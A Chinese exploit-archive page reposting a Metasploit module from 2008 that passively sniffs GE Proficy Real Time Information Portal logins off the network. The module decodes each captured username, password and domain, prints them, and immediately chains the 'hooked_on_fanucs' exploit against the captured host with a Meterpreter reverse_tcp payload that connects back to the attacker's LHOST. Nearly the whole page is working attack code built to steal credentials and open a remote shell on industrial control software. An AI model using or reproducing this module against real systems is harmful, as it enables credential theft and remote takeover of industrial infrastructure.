首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GE Proficy Real Time Information Portal Credentials Leak Sniffer (meta)
来源:http://metasploit.com 作者:hdm 发布时间:2008-11-10  
##
# $Id: rtipsniff.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
# MacbookPro:metasploit kfinisterre$ cd /Users/kfinisterre/Desktop/metasploit; sudo ./msfcli auxiliary/test/rtipsniff INTERFACE=en1  E
# [*] Opening the network interface...
# [*] Sniffing RTIP login requests...
# [*] Proficy RTIP Credentials -> user: Administrator pass: This was base64 encoded domain: ProficySniffTest
#
#
#


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

include Msf::Auxiliary::Report
include Msf::Exploit::Capture

def initialize
super(
'Name'        => 'GE Proficy Real Time Information Portal Credentials Leak',
'Version'     => '$Revision: 1 $',
'Description' => 'This module sniffs RTIP login requests from the network',
'Author'      => ['hdm','kf'],
'License'     => MSF_LICENSE,
'Actions'     =>
[
[ 'Sniffer' ]
],
'PassiveActions' =>
[
'Sniffer'
],
'DefaultAction'  => 'Sniffer'
)
register_options([
                        OptAddress.new('LHOST', [true, 'The IP address to use for reverse-connect payloads']),
                        OptPort.new('LPORT', [false, 'The starting TCP port number for reverse-connect payloads', 4444])
                ], self.class)
end

        def init_hooked_on_fanucs(name,user,pass,domain, rhost, targ = 0)
                targ ||= 0
                payload='windows/meterpreter/reverse_tcp'
                sploit = framework.modules.create(name)
               
                sploit.datastore['USERNAME']   = user
                sploit.datastore['PASSWORD']   = pass
                sploit.datastore['DOMAIN']   = domain
                sploit.datastore['RHOST']   = rhost
                sploit.datastore['LPORT']   = datastore['LPORT']
                sploit.datastore['LHOST']   = datastore['LHOST']
                sploit.exploit_simple(
                        'LocalInput'     => self.user_input,
                        'LocalOutput'    => self.user_output,
                        'Target'         => targ,
                        'Payload'        => payload,
                        'RunAsJob'       => true)
        end
               

def run
username = "a", password = "b", domain = "c"

print_status("Opening the network interface...")
open_pcap()

print_status("Sniffing RTIP login requests...")
each_packet() do |pkt|
next if not pkt.tcp?

                        if (pkt.payload =~ /\x56\x5d\x72\x2b\x30\xd7\xf2\xc6\x74/)

                                marker = "\x56\x5d\x72\x2b\x30\xd7\xf2\xc6\x74"
                                data = pkt.payload

                                credentials = data.split(marker)[1].split("\x00") 
                                username = credentials[1]
                                password = credentials[2]
                                domain = credentials[3].split("\x01")[0]
                                username = username[1..(username.length-2)]
                                password = password[1..(password.length-2)].unpack("m")
                                domain = domain[1..(domain.length-2)]
                                print_status("Proficy RTIP Credentials -> user: #{username} pass: #{password} domain: #{domain} ip: #{pkt.ip_daddr}")

        init_hooked_on_fanucs('exploit/windows/misc/hooked_on_fanucs',"#{username}","#{password}","#{domain}", "#{pkt.ip_daddr}")
                        end

true
end

print_status("Finished sniffing")
end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VLC Media Player < 0.9.6 .RT S
·MemHT Portal <= 4.0 Remote Cod
·e-Vision CMS <= 2.0.2 Multiple
·Mambo Component n-form (form_i
·Simple Machines Forum <= 1.1.6
·Adobe Reader util.printf() Jav
·PHPX 3.5.16 (news_id) Remote S
·PhpCms2007 sp6 SQL injection 0
·Simple Machines Forum (SMF) 1.
·TR News <= 2.1 (login.php) Rem
·ooVoo 1.7.1.35 (URL Protocol)
·smcFanControl 2.1.2 Multiple B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved